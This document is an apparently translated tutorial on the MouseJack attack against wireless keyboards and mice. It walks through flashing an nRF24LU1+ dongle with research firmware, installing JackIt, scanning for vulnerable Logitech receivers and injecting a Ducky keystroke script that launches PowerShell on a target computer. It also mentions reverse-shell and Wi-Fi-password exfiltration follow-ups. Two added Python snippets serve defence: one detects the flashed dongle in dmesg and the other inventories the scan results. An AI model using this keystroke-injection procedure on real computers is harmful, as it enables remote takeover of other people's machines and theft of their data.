
Attacking Logitech keyboards with an nRF24LU1+ transceiver

This is a keyboard and mouse attack vulnerability from four years ago. Wireless mice and keyboards made by AmazonBasics, Dell, Gigabyte, HP, Lenovo, Logitech and Microsoft are affected by a number of MouseJack vulnerabilities. An attacker with a Crazyradio PA device (nRF24LU1+) can inject keystrokes into most of these USB dongles, and can also sniff keystrokes and carry out denial-of-service attacks. Ultimately this allows an attacker to compromise and remotely control a computer from up to 250 feet away.


Crazyradio PA USB wireless dongle based on Nordic Semiconductor's nRF24LU1+

Flashing the firmware

First, the new nRF24LU1+ hardware needs to be flashed with custom firmware so that it can scan for vulnerable devices and inject keystrokes. Begin by making sure Kali's APT package index is up to date:

~$ apt-get update

Building and automating the flashing process with the Python scripts requires several dependencies. Use the apt-get command below to make sure Git, Python and the other required packages are installed and up to date.

~$ apt-get install sdcc binutils python python-pip git

Reading package lists... Done
Building dependency tree
Reading state information... Done
python is already the newest version (2.7.16-1).
python-pip is already the newest version (18.1-5).
The following packages were automatically installed and are no longer required:
  libpython3.6-minimal libpython3.6-stdlib python3.6 python3.6-minimal
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
  binutils-common binutils-x86-64-linux-gnu gputils gputils-common gputils-doc libbinutils sdcc-doc sdcc-libraries
Suggested packages:
  binutils-doc sdcc-ucsim
The following NEW packages will be installed:
  gputils gputils-common gputils-doc sdcc sdcc-doc sdcc-libraries
The following packages will be upgraded:
  binutils binutils-common binutils-x86-64-linux-gnu libbinutils
4 upgraded, 6 newly installed, 0 to remove and 108 not upgraded.
Need to get 9,868 kB of archives.
After this operation, 63.7 MB of additional disk space will be used.
Do you want to continue? [Y/n]

The pip version available in the Kali repositories may be somewhat outdated, so upgrade it first.

~$ pip install --upgrade pip

Collecting pip
  Downloading https://files.pythonhosted.org/packages/f9/fb/863012b13912709c13cf5cfdbfb304fa6c727659d6290438e1a88df9d848/pip-19.1-py2.py3-none-any.whl (1.4MB)
    100% |████████████████████████████████| 1.4MB 114kB/s
Installing collected packages: pip
  Found existing installation: pip 18.1
    Not uninstalling pip at /usr/lib/python2.7/dist-packages, outside environment /usr
    Can't uninstall 'pip'. No files were found to uninstall.
Successfully installed pip-19.1

A few more dependencies need to be installed with pip. When installing the PyUSB package (the Python USB access module), use the -I option.

~$ pip install --upgrade -I pyusb

DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7.
Collecting pyusb
  Downloading https://files.pythonhosted.org/packages/5f/34/2095e821c01225377dda4ebdbd53d8316d6abb243c9bee43d3888fa91dd6/pyusb-1.0.2.tar.gz (54kB)
     |████████████████████████████████| 61kB 82kB/s
Building wheels for collected packages: pyusb
  Building wheel for pyusb (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/1f/a9/7e/d189b5030ee3a56f9b72c28281bb11d661b8ea312e28de08a5
Successfully built pyusb
Installing collected packages: pyusb
Successfully installed pyusb-1.0.2

Finally, install the latest PlatformIO package, an open-source ecosystem for IoT development.

~$ pip install --upgrade platformio

Collecting platformio
  Downloading https://files.pythonhosted.org/packages/fe/01/69aa7d8ef8cd74493338396ff86dc1bbfe85ae58b77fc705924c920a38eb/platformio-3.6.7-py27-none-any.whl (161kB)
     |████████████████████████████████| 163kB 92kB/s
Collecting pyserial!=3.3,<4,>=3 (from platformio)
  Downloading https://files.pythonhosted.org/packages/0d/e4/2a744dd9e3be04a0c0907414e2a01a7c88bb3915cbe3c8cc06e209f59c30/pyserial-3.4-py2.py3-none-any.whl (193kB)
     |████████████████████████████████| 194kB 179kB/s
Requirement already satisfied, skipping upgrade: requests<3,>=2.4.0 in /usr/lib/python2.7/dist-packages (from platformio) (2.21.0)
Collecting click<6,>=5 (from platformio)
  Downloading https://files.pythonhosted.org/packages/8f/98/14966b6d772fd5fba1eb3bb34a62a7f736d609572493397cdc5715c14514/click-5.1-py2.py3-none-any.whl (65kB)
     |████████████████████████████████| 71kB 188kB/s
Requirement already satisfied, skipping upgrade: colorama in /usr/lib/python2.7/dist-packages (from platformio) (0.3.7)
Collecting bottle<0.13 (from platformio)
  Downloading https://files.pythonhosted.org/packages/32/4e/ed046324d5ec980c252987c1dca191e001b9f06ceffaebf037eef469937c/bottle-0.12.16.tar.gz (72kB)
     |████████████████████████████████| 81kB 153kB/s
Collecting semantic-version<3,>=2.5.0 (from platformio)
  Downloading https://files.pythonhosted.org/packages/72/83/f76958017f3094b072d8e3a72d25c3ed65f754cc607fdb6a7b33d84ab1d5/semantic_version-2.6.0.tar.gz
Building wheels for collected packages: bottle, semantic-version
  Building wheel for bottle (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/0c/68/ac/1546dcb27101ca6c4e50c5b5da92dbd3307f07cda5d88e81c7
  Building wheel for semantic-version (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/60/bb/50/215d669d31f992767f5dd8d3c974e79261707ee7f898f0dc10
Successfully built bottle semantic-version
Installing collected packages: pyserial, click, bottle, semantic-version, platformio
  Found existing installation: Click 7.0
    Uninstalling Click-7.0:
      Successfully uninstalled Click-7.0
Successfully installed bottle-0.12.16 click-5.1 platformio-3.6.7 pyserial-3.4 semantic-version-2.6.0

Cloning the MouseJack repository

Clone the MouseJack script repository from GitHub into the /opt directory.

~$ git clone https://github.com/BastilleResearch/mousejack /opt/mousejack

Cloning into '/opt/mousejack'...
remote: Enumerating objects: 285, done.
remote: Total 285 (delta 0), reused 0 (delta 0), pack-reused 285
Receiving objects: 100% (285/285), 8.63 MiB | 353.00 KiB/s, done.
Resolving deltas: 100% (131/131), done.

Change into the new mousejack directory.

~$ cd /opt/mousejack/

Use the submodule init option to initialise the local configuration for nrf-research-firmware. This is the firmware that gets flashed onto the nRF24LU1+ device.

/opt/mousejack$ git submodule init

Submodule 'nrf-research-firmware' (https://github.com/BastilleResearch/nrf-research-firmware.git) registered for path 'nrf-research-firmware'

Then use the submodule update option to fetch all of its data and check out the appropriate commit that is listed.

/opt/mousejack$ git submodule update

Cloning into '/opt/mousejack/nrf-research-firmware'...
Submodule path 'nrf-research-firmware': checked out '02b84d1c4e59c0fb98263c83b2e7c7f9863a3b93'

Change into nrf-research-firmware.

/opt/mousejack$ cd nrf-research-firmware/

Run make to execute the commands in the Makefile.

/nrf-research-firmware$ make

mkdir -p bin
sdcc --model-large --std-c99 -c src/main.c -o bin/main.rel
sdcc --model-large --std-c99 -c src/usb.c -o bin/usb.rel
sdcc --model-large --std-c99 -c src/usb_desc.c -o bin/usb_desc.rel
sdcc --model-large --std-c99 -c src/radio.c -o bin/radio.rel
sdcc --xram-loc 0x8000 --xram-size 2048 --model-large bin/main.rel bin/usb.rel bin/usb_desc.rel bin/radio.rel -o bin/dongle.ihx
objcopy -I ihex bin/dongle.ihx -O binary bin/dongle.bin
objcopy --pad-to 26622 --gap-fill 255 -I ihex bin/dongle.ihx -O binary bin/dongle.formatted.bin
objcopy -I binary bin/dongle.formatted.bin -O ihex bin/dongle.formatted.ihx

At this point, plug the nRF24LU1+ device into the computer. Then run the make install command.

/nrf-research-firmware$ make install

./prog/usb-flasher/usb-flash.py bin/dongle.bin
[2020-08-15 23:55:44.351]  Looking for a compatible device that can jump to the Nordic bootloader
[2020-08-15 23:55:44.378]  Device found, jumping to the Nordic bootloader
[2020-08-15 23:55:44.969]  Looking for a device running the Nordic bootloader
[2020-08-15 23:55:45.171]  Writing image to flash
[2020-08-15 23:55:45.808]  Verifying write
[2020-08-15 23:55:45.867]  Firmware programming completed successfully
[2020-08-15 23:55:45.867]  Please unplug your dongle or breakout board and plug it back in.

As instructed, unplug the nRF24LU1+ from the computer. To verify that the firmware was flashed, plug the nRF24LU1+ back into the computer and use the dmesg command. The Product and Manufacturer lines should read "Research Firmware" and "RFStorm" respectively.

/nrf-research-firmware$ dmesg

[ 2433.986481] usb 2-1: new full-speed USB device number 3 using xhci_hcd
[ 2434.136930] usb 2-1: New USB device found, idVendor=1915, idProduct=0102, bcdDevice= 0.01
[ 2434.136938] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 2434.136942] usb 2-1: Product: Research Firmware
[ 2434.136946] usb 2-1: Manufacturer: RFStorm
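To make that dmesg check repeatable, and because the same identifiers let a defender spot such a research dongle plugged into a managed host, here is an added example in Python that is not part of the MouseJack project. The expected values are taken from the dmesg lines above; the second device in the sample log is constructed for the example.

```python
import re
from collections import defaultdict
# Identifiers the post's dmesg output shows for the research firmware.
EXPECTED = {"idVendor": "1915", "idProduct": "0102", "Product": "Research Firmware", "Manufacturer": "RFStorm"}
# A dmesg line looks like "[ 2434.136942] usb 2-1: Product: Research Firmware".
LINE_RE = re.compile(r"\]\s+usb (?P<dev>[\d.-]+): (?P<msg>.*)$")
ID_RE = re.compile(r"idVendor=(?P<idVendor>[0-9a-f]{4}), idProduct=(?P<idProduct>[0-9a-f]{4})")
STR_RE = re.compile(r"^(?P<key>Product|Manufacturer): (?P<val>.*)$")

def parse_usb_devices(log_text):
    """Collect the attributes dmesg reports per USB device, keyed by bus path such as '2-1'."""
    devices = defaultdict(dict)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        dev, msg = m.group("dev"), m.group("msg")
        ids = ID_RE.search(msg)
        if ids:
            devices[dev].update(ids.groupdict())
        s = STR_RE.match(msg)
        if s:
            devices[dev][s.group("key")] = s.group("val")
    return dict(devices)

def classify(attrs):
    """'research' when all four identifiers match; 'vidpid_only' when only the Nordic
    VID/PID match (flash did not take, or other firmware); None for any other device."""
    if (attrs.get("idVendor"), attrs.get("idProduct")) != (EXPECTED["idVendor"], EXPECTED["idProduct"]):
        return None
    if all(attrs.get(k) == EXPECTED[k] for k in ("Product", "Manufacturer")):
        return "research"
    return "vidpid_only"

def find_research_dongles(log_text):
    """Map bus path -> verdict for every device carrying the Nordic VID/PID."""
    verdicts = ((dev, classify(a)) for dev, a in parse_usb_devices(log_text).items())
    return {dev: v for dev, v in verdicts if v}

# Constructed sample: the dmesg lines from the post, plus a second dongle (made up for
# this example) that carries the Nordic VID/PID but still reports other strings.
SAMPLE_LOG = """\
[ 2433.986481] usb 2-1: new full-speed USB device number 3 using xhci_hcd
[ 2434.136930] usb 2-1: New USB device found, idVendor=1915, idProduct=0102, bcdDevice= 0.01
[ 2434.136942] usb 2-1: Product: Research Firmware
[ 2434.136946] usb 2-1: Manufacturer: RFStorm
[ 2500.000000] usb 1-3: New USB device found, idVendor=1915, idProduct=0102, bcdDevice= 0.01
[ 2500.000010] usb 1-3: Product: Example Stock Firmware
[ 2500.000020] usb 1-3: Manufacturer: ExampleCo
"""
```

On a live Kali box, pass it the kernel log, for example find_research_dongles(subprocess.run(["dmesg"], capture_output=True, text=True).stdout); reading the ring buffer may require root.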

Cloning the JackIt repository

With the nRF24LU1+ device set up, it is now possible to scan the surrounding area for wireless mice and keyboards. The MouseJack repository contains several excellent Python scripts, but we will use the JackIt script instead to automate keystroke injection.

Created by phikshun and infamy, JackIt is an automated tool designed to inject USB Rubber Ducky scripts as keystrokes into vulnerable devices.

Start by downloading the JackIt repository.


~$ git clone https://github.com/insecurityofthings/jackit.git /opt/jackit

Cloning into '/opt/jackit'...
remote: Enumerating objects: 718, done.
remote: Total 718 (delta 0), reused 0 (delta 0), pack-reused 718
Receiving objects: 100% (718/718), 171.39 KiB | 153.00 KiB/s, done.
Resolving deltas: 100% (439/439), done.

Change into the new jackit directory and list its contents.

~$ cd /opt/jackit/

/opt/jackit$ ls -la

total 48
drwxr-xr-x 6 root root 4096 Apr 26 22:25 .
drwxr-xr-x 6 root root 4096 Apr 26 22:25 ..
drwxr-xr-x 2 root root 4096 Apr 26 22:25 bin
drwxr-xr-x 2 root root 4096 Apr 26 22:25 examples
drwxr-xr-x 8 root root 4096 Apr 26 22:25 .git
-rw-r--r-- 1 root root 1072 Apr 26 22:25 .gitignore
drwxr-xr-x 5 root root 4096 Apr 26 22:25 jackit
-rw-r--r-- 1 root root 4743 Apr 26 22:25 README.md
-rw-r--r-- 1 root root   52 Apr 26 22:25 requirements.txt
-rwxr-xr-x 1 root root  594 Apr 26 22:25 setup.py
-rw-r--r-- 1 root root  289 Apr 26 22:25 tox.ini

Here we find a "requirements.txt" file, which indicates several dependencies that should be installed with pip. That is all there is to the setup.

/opt/jackit$ pip install -e .

Obtaining file:///opt/jackit
Requirement already satisfied: click==5.1 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (5.1)
Collecting pyusb==1.0.0 (from JackIt==0.1.0)
  Downloading https://files.pythonhosted.org/packages/8a/19/66fb48a4905e472f5dfeda3a1bafac369fbf6d6fc5cf55b780864962652d/PyUSB-1.0.0.tar.gz (52kB)
     |████████████████████████████████| 61kB 81kB/s
Collecting six==1.10.0 (from JackIt==0.1.0)
  Downloading https://files.pythonhosted.org/packages/c8/0a/b6723e1bc4c516cb687841499455a8505b44607ab535be01091c0f24f079/six-1.10.0-py2.py3-none-any.whl
Collecting tabulate==0.7.5 (from JackIt==0.1.0)
  Downloading https://files.pythonhosted.org/packages/db/40/6ffc855c365769c454591ac30a25e9ea0b3e8c952a1259141f5b9878bd3d/tabulate-0.7.5.tar.gz
Building wheels for collected packages: pyusb, tabulate
  Building wheel for pyusb (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/a6/69/c7/258e736ee9bdb4553bd9701424b259436b979cf96201af612f
  Building wheel for tabulate (setup.py) ... done
  Stored in directory: /root/.cache/pip/wheels/96/9c/9a/369b6376b11523584a6040a89488c28f0f88cb52167dceb648
Successfully built pyusb tabulate
Installing collected packages: pyusb, six, tabulate, JackIt
  Found existing installation: pyusb 1.0.2
    Uninstalling pyusb-1.0.2:
      Successfully uninstalled pyusb-1.0.2
  Found existing installation: six 1.12.0
    Uninstalling six-1.12.0:
      Successfully uninstalled six-1.12.0
  Running setup.py develop for JackIt
Successfully installed JackIt pyusb-1.0.0 six-1.10.0 tabulate-0.7.5

Attacking wireless keyboards and mice

Simply type jackit in any terminal to scan the surrounding area for vulnerable devices.

~$ jackit

     ____.              __   .___  __
    |    |____    ____ |  | _|   |/  |_
    |    \__  \ _/ ___\|  |/ /   \   __\
/\__|    |/ __ \\  \___|    <|   ||  |
\________(____  /\___  >__|_ \___||__|
              \/     \/     \/
JackIt Version 1.00
Created by phikshun, infamy

[!] You must supply a ducky script using --script <filename>
[!] Attacks are disabled.
[+] Starting scan...

[+] Scanning every 5s CTRL-C when ready.

  KEY  ADDRESS         CHANNELS                    COUNT  SEEN         TYPE          PACKET
-----  --------------  ------------------------  -------  -----------  ------------  -----------------------------
    1  C7:D4:21:98:07  74                              3  0:00:07 ago  Logitech HID  00:C2:00:00:03:10:00:00:00:2B

JackIt will continuously scan the area for wireless mice and keyboards. Vulnerable devices are identified in the terminal by their address (serial number), channels and type. This information can be used for a targeted attack. For example, the USB Rubber Ducky payload below can be used to open the Run window and inject keystrokes into the target computer.

GUI r
DELAY 1000
STRING powershell <payload here>
ENTER

To use a USB Rubber Ducky script with JackIt, use the following command.

~$ jackit --reset --address C7:D4:21:98:07 --vendor Logitech --script /path/to/ducky/script.txt

Press Ctrl+C to stop scanning. JackIt will ask which address to inject keystrokes into. This is a targeted attack, so only one serial number appears in the scan. Press 1, then Enter.

[+] Sniffing for C7:D4:21:98:07 every 5s CTRL-C when ready.

  KEY  ADDRESS           CHANNELS    COUNT  SEEN         TYPE          PACKET
-----  --------------  ----------  -------  -----------  ------------  -----------------------------
    1  C7:D4:21:98:07           2        1  0:00:10 ago  Logitech HID  00:C2:00:00:00:00:00:00:00:00
^C

[+] Select target keys (1-1) separated by commas, or 'all':  [all]: 1
[+] Ping success on channel 65
[+] Sending attack to C7:D4:21:98:07 [Logitech HID] on channel 65

[+] All attacks completed

The Ducky script will open the Run window and type some arbitrary text. More sophisticated PowerShell attacks could include Wi-Fi password exfiltration, live streaming of the Windows 10 desktop, and a Powercat reverse shell with a payload hosted on a Microsoft server.
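The two scan tables above (the broadcast scan and the targeted sniff) share one layout. As an added example that is not JackIt's own code, the parser below turns that output into records and merges repeated scans by address, which is what a defender surveying an office needs in order to log which receivers in range JackIt identifies as injectable. The column layout comes from the tables in the post; the row regex and the merge logic are this example's own, and the sample output is the post's two tables pasted together.

```python
import re
from collections import defaultdict

# One table row as JackIt prints it (layout taken from the scans in the post):
#     1  C7:D4:21:98:07  74      3  0:00:07 ago  Logitech HID  00:C2:00:00:03:10:00:00:00:2B
ROW_RE = re.compile(
    r"^\s*(?P<key>\d+)\s+(?P<address>(?:[0-9A-F]{2}:){4}[0-9A-F]{2})\s+"
    r"(?P<channels>\d+(?:,\d+)*)\s+(?P<count>\d+)\s+(?P<seen>\S+ ago)\s+"
    r"(?P<type>\S.*?\S)\s{2,}(?P<packet>(?:[0-9A-F]{2}:)*[0-9A-F]{2})\s*$")

def parse_scan(text):
    """Return one dict per table row; header, separator and status lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            r = m.groupdict()
            r["key"], r["count"] = int(r["key"]), int(r["count"])
            r["channels"] = [int(c) for c in r["channels"].split(",")]
            r["packet"] = bytes.fromhex(r["packet"].replace(":", ""))
            rows.append(r)
    return rows

def inventory(text):
    """Merge rows by address across repeated scans (JackIt reprints the table every 5 s):
    union of channels, total packet count, and the set of types JackIt assigned."""
    merged = defaultdict(lambda: {"channels": set(), "count": 0, "types": set()})
    for r in parse_scan(text):
        entry = merged[r["address"]]
        entry["channels"].update(r["channels"])
        entry["count"] += r["count"]
        entry["types"].add(r["type"])
    return dict(merged)

# Constructed sample: the two scan tables from the post, one after the other, as a
# terminal log of a site survey would contain them.
SAMPLE_OUTPUT = """\
[+] Scanning every 5s CTRL-C when ready.

  KEY  ADDRESS         CHANNELS                    COUNT  SEEN         TYPE          PACKET
-----  --------------  ------------------------  -------  -----------  ------------  -----------------------------
    1  C7:D4:21:98:07  74                              3  0:00:07 ago  Logitech HID  00:C2:00:00:03:10:00:00:00:2B
[+] Sniffing for C7:D4:21:98:07 every 5s CTRL-C when ready.

  KEY  ADDRESS           CHANNELS    COUNT  SEEN         TYPE          PACKET
-----  --------------  ----------  -------  -----------  ------------  -----------------------------
    1  C7:D4:21:98:07           2        1  0:00:10 ago  Logitech HID  00:C2:00:00:00:00:00:00:00:00
"""
```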
